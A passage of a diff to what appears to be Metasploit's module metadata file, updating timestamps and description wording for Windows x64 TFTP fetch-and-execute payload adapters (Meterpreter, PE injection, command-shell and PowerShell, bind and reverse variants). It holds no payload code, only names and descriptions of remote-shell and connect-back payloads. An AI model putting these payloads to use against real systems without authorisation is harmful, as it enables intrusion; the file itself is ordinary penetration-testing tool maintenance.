"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221570,7 +225231,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp",
|
||||
@@ -221607,7 +225268,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221618,7 +225279,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4",
|
||||
@@ -221651,7 +225312,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221662,7 +225323,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid",
|
||||
@@ -221695,7 +225356,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221706,7 +225367,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_winhttp",
|
||||
@@ -221739,7 +225400,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221750,7 +225411,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_winhttps",
|
||||
@@ -221783,7 +225444,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221794,7 +225455,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter_bind_named_pipe",
|
||||
@@ -221824,7 +225485,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221835,7 +225496,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter_bind_tcp",
|
||||
@@ -221865,7 +225526,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221876,7 +225537,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_http",
|
||||
@@ -221906,7 +225567,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221917,7 +225578,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_https",
|
||||
@@ -221947,7 +225608,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221958,7 +225619,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp",
|
||||
@@ -221988,7 +225649,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221999,7 +225660,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_tcp",
|
||||
@@ -222029,7 +225690,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222039,7 +225700,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/bind_ipv6_tcp",
|
||||
@@ -222072,7 +225733,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222082,7 +225743,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
@@ -222114,7 +225775,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222124,7 +225785,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/bind_named_pipe",
|
||||
@@ -222156,7 +225817,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222166,7 +225827,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp",
|
||||
@@ -222203,7 +225864,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222213,7 +225874,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp_rc4",
|
||||
@@ -222246,7 +225907,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222256,7 +225917,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp_uuid",
|
||||
@@ -222288,7 +225949,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222298,7 +225959,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/reverse_named_pipe",
|
||||
@@ -222330,7 +225991,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222340,7 +226001,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp",
|
||||
@@ -222377,7 +226038,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222387,7 +226048,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp_rc4",
|
||||
@@ -222420,7 +226081,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222430,7 +226091,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp_uuid",
|
||||
@@ -222461,7 +226122,7 @@
|
||||
"Brendan Watters",
|
||||
"bwatters-r7"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222471,7 +226132,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/pingback_reverse_tcp",
|
||||
@@ -222502,7 +226163,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -222512,7 +226173,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/powershell_bind_tcp",
|
||||
@@ -222543,7 +226204,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -222553,7 +226214,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/powershell_reverse_tcp",
|
||||
@@ -222584,7 +226245,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -222594,7 +226255,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/powershell_reverse_tcp_ssl",
|
||||
@@ -222623,7 +226284,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222633,7 +226294,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/bind_ipv6_tcp",
|
||||
@@ -222665,7 +226326,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222675,7 +226336,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid",
|
||||
@@ -222707,7 +226368,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222717,7 +226378,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/bind_named_pipe",
|
||||
@@ -222748,7 +226409,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222758,7 +226419,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/bind_tcp",
|
||||
@@ -222794,7 +226455,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222804,7 +226465,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/bind_tcp_rc4",
|
||||
@@ -222836,7 +226497,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222846,7 +226507,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/bind_tcp_uuid",
|
||||
@@ -222877,7 +226538,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222887,7 +226548,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp",
|
||||
@@ -222923,7 +226584,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222933,7 +226594,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
